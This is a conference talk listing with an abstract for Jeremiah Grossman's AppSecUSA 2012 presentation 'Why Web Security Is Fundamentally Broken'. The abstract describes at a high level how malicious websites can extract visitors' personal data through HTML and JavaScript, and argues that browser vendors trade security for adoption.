Why Web Security Is Fundamentally Broken presented at AppSecUSA 2012

by Jeremiah Grossman,

Tags: Security

Summary : Most people are disturbed when they witness just how much of their personal information is accessible the very moment they visit a website. Then, if you give that [malicious] website just one mouse-click --- out goes even more personally identifiable data. Were talking about full names, where you live, the town where you grew up and went to school, martial status, list of friends, sites you are logged-in to, the software you use complete with version numbers, and in some cases, your browsers auto-complete data and history of other sites youve visited. All of this is performed using nothing but HTML and JavaScript. No need for memory corrupting exploits that escape the confines of the browser walls.
Through a demo-driven presentation, the audience will see first-hand how and why all these attacks are possible, even in the presence of browser silent updates and the latest security improvements such as sandboxes, anti-phishing protections, and the availability of Content Security Policy, X-Frame-Options, Origin, Strict Transport Security, SSL, etc. And just so everyone is crystal clear, firewalls dont help and neither does anti-virus software. The reason why none of this works is that these web attacks take advantage of flaws in the way the Web was designed to work! Adding insult to injury most of the techniques on display are NOT technically new, and this talk will cleverly wire these issues together to make a point, and tell a story. It is the story of Why Web Security Is Fundamentally Broken.
Heres the punchline: The only known ways to fix these issues adequately is to break the Web -- i.e. negatively impact the usability of a significant percentage of websites. Doing so directly conflicts with business interests of the current browser vendors who are looking to grow market share and advertising revenue. Their choice is simple, be less secure and more adopted, rather than secure and obscure. This is the Web security trade-off thats being made for us.